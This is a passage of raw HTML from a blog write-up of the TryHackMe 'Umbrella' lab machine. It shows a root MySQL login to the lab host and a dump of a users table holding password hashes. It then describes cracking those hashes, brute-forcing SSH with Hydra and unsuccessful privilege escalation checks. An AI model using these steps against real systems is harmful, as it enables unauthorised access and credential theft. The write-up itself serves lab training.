data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/db-creds.png?fit=717%2C331&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/db-creds.png?resize=717%2C331&#038;ssl=1\" alt=\"\" class=\"wp-image-126\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/db-creds.png?w=717&amp;ssl=1 717w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/db-creds.png?resize=300%2C138&amp;ssl=1 300w\" sizes=\"auto, (max-width: 717px) 100vw, 717px\" \/><\/figure>\n\n\n\n<div style=\"height:34px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Using these credentials, we can connect to MySQL on the machine.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#292D3E\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Linux-Boxes\/Umbrella]\n\u2514\u2500$ mysql -u root -h 10.10.166.146 -p  \nEnter password: \nWelcome to the MariaDB monitor.  Commands end with ; or \\g.\nYour MySQL connection id is 5\nServer version: 5.7.40 MySQL Community Server (GPL)\n\nCopyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.\n\nType 'help;' or '\\h' for help. Type '\\c' to clear the current input statement.\n\nMySQL [(none)]&gt; \" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-palenight\" style=\"background-color: #292D3E\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Linux-Boxes\/Umbrella<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">mysql<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-u<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">root<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-h<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.10<\/span><span style=\"color: #C3E88D\">.166.146<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-p<\/span><span style=\"color: #BABED8\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Enter<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">password:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Welcome<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">the<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">MariaDB<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">monitor.<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">Commands<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">end<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">with<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">or<\/span><span style=\"color: #BABED8\"> \\g<\/span><span style=\"color: #C3E88D\">.<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Your<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">MySQL<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">connection<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">id<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">is<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">5<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Server<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">version:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">5.7<\/span><span style=\"color: #C3E88D\">.40<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">MySQL<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Community<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Server<\/span><span style=\"color: #BABED8\"> (GPL)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Copyright<\/span><span style=\"color: #BABED8\"> (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Type<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">help;<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">or<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">\\h<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">for<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">help.<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Type<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">\\c<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">clear<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">the<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">current<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">input<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">statement.<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">MySQL<\/span><span style=\"color: #BABED8\"> [(none)]<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\"> <\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Enumerating the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\"><strong><em>timetracking <\/em><\/strong><\/mark>database, we see there is a users table that usually contains usernames and passwords for users who can log in to web portals.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#292D3E\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"MySQL [(none)]&gt; show databases;\n+--------------------+\n| Database           |\n+--------------------+\n| information_schema |\n| mysql              |\n| performance_schema |\n| sys                |\n| timetracking       |\n+--------------------+\n5 rows in set (0.206 sec)\n\nMySQL [(none)]&gt; use timetracking;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\n\nDatabase changed\nMySQL [timetracking]&gt; show tables;\n+------------------------+\n| Tables_in_timetracking |\n+------------------------+\n| users                  |\n+------------------------+\n1 row in set (0.200 sec)\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-palenight\" style=\"background-color: #292D3E\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">MySQL<\/span><span style=\"color: #BABED8\"> [(none)]<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\"> show databases<\/span><span style=\"color: #89DDFF\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">+--------------------+<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">Database<\/span><span style=\"color: #BABED8\">           <\/span><span style=\"color: #89DDFF\">|<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">+--------------------+<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">information_schema<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">|<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">mysql<\/span><span style=\"color: #BABED8\">              <\/span><span style=\"color: #89DDFF\">|<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">performance_schema<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">|<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">sys<\/span><span style=\"color: #BABED8\">                <\/span><span style=\"color: #89DDFF\">|<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">timetracking<\/span><span style=\"color: #BABED8\">       <\/span><span style=\"color: #89DDFF\">|<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">+--------------------+<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">5<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">rows<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">in<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">set<\/span><span style=\"color: #BABED8\"> (0.206 <\/span><span style=\"color: #C3E88D\">sec<\/span><span style=\"color: #BABED8\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">MySQL<\/span><span style=\"color: #BABED8\"> [(none)]<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\"> use timetracking<\/span><span style=\"color: #89DDFF\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Reading<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">table<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">information<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">for<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">completion<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">of<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">table<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">and<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">column<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">names<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">You<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">can<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">turn<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">off<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">this<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">feature<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">get<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">a<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">quicker<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">startup<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">with<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-A<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Database<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">changed<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">MySQL<\/span><span style=\"color: #BABED8\"> [timetracking]<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\"> show tables<\/span><span style=\"color: #89DDFF\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">+------------------------+<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">Tables_in_timetracking<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">|<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">+------------------------+<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">users<\/span><span style=\"color: #BABED8\">                  <\/span><span style=\"color: #89DDFF\">|<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">+------------------------+<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">1<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">row<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">in<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">set<\/span><span style=\"color: #BABED8\"> (0.200 <\/span><span style=\"color: #C3E88D\">sec<\/span><span style=\"color: #BABED8\">)<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:40px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Let&#8217;s dump the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\"><strong><em>users <\/em><\/strong><\/mark>table to find credentials.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#292D3E\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"MySQL [timetracking]&gt; select * from users;\n+----------+----------------------------------+-------+\n| user     | pass                             | time  |\n+----------+----------------------------------+-------+\n| claire-r | 2ac9cb7dc02b3c0083eb70898e549b63 |   360 |\n| chris-r  | 0d107d09f5bbe40cade3de5c71e9e9b7 |   420 |\n| jill-v   | d5c0607301ad5d5c1528962a83992ac8 |   564 |\n| barry-b  | 4a04890400b5d7bac101baace5d7e994 | 47893 |\n+----------+----------------------------------+-------+\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-palenight\" style=\"background-color: #292D3E\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">MySQL<\/span><span style=\"color: #BABED8\"> [timetracking]<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF; font-style: italic\">select<\/span><span style=\"color: #BABED8\"> * from users<\/span><span style=\"color: #89DDFF\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">+----------+----------------------------------+-------+<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">user<\/span><span style=\"color: #BABED8\">     <\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">pass<\/span><span style=\"color: #BABED8\">                             <\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">time<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #89DDFF\">|<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">+----------+----------------------------------+-------+<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">claire-r<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">2ac9cb7dc02b3c0083eb70898e549b63<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">360<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">|<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">chris-r<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">0d107d09f5bbe40cade3de5c71e9e9b7<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">420<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">|<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">jill-v<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">d5c0607301ad5d5c1528962a83992ac8<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">564<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">|<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">barry-b<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">4a04890400b5d7bac101baace5d7e994<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">47893<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">|<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">+----------+----------------------------------+-------+<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:29px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>After getting hashes, let\u2019s crack them (Use CrackStation) and add them to a password.txt file. We will also create a users.txt file with all the usernames we found in the database.<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:36px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Using <a href=\"https:\/\/crackstation.net\/\" target=\"_blank\" rel=\"noopener noreferrer nofollow\" title=\"CrackStation\">CrackStation<\/a>, we can get the passwords for all the hashes. We can create a users.txt file and add all the users found in the database and pass.txt files and add passwords to it.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">SSH Brute-Force<\/mark> <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">(Foothold)<\/mark><\/h3>\n\n\n\n<p>Using Hydra, we can brute force SSH and see if any of the user credentials are valid for connecting to SSH.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"258\" data-attachment-id=\"129\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/ssh-brute\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssh-brute.png?fit=1394%2C351&amp;ssl=1\" data-orig-size=\"1394,351\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"ssh-brute\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssh-brute.png?fit=1024%2C258&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssh-brute.png?resize=1024%2C258&#038;ssl=1\" alt=\"\" class=\"wp-image-129\" style=\"width:901px;height:auto\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssh-brute.png?resize=1024%2C258&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssh-brute.png?resize=300%2C76&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssh-brute.png?resize=768%2C193&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssh-brute.png?w=1394&amp;ssl=1 1394w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:45px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>We will get our users.txt flag from claire-r\u2019s home directory<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Privilege Escalation<\/mark><\/h2>\n\n\n\n<p><em>I tried the following steps below did not reveal anything useful:<\/em><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Checking SUDO permissions (User is not in the sudoers group)<\/li>\n\n\n\n<li>No SUID binaries<\/li>\n\n\n\n<li>Did not find any interesting files that could help in privilege or lateral escalation<\/li>\n\n\n\n<li>Running linpeas did not reveal anything useful<\/li>\n\n\n\n<li>PSPY did not show any cron jobs running that we can abuse to get root access<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Port 8080<\/mark><\/h3>\n\n\n\n<figure class=\"wp-block-image size-full\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"565\" height=\"365\" data-attachment-id=\"134\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/image-1\/\" 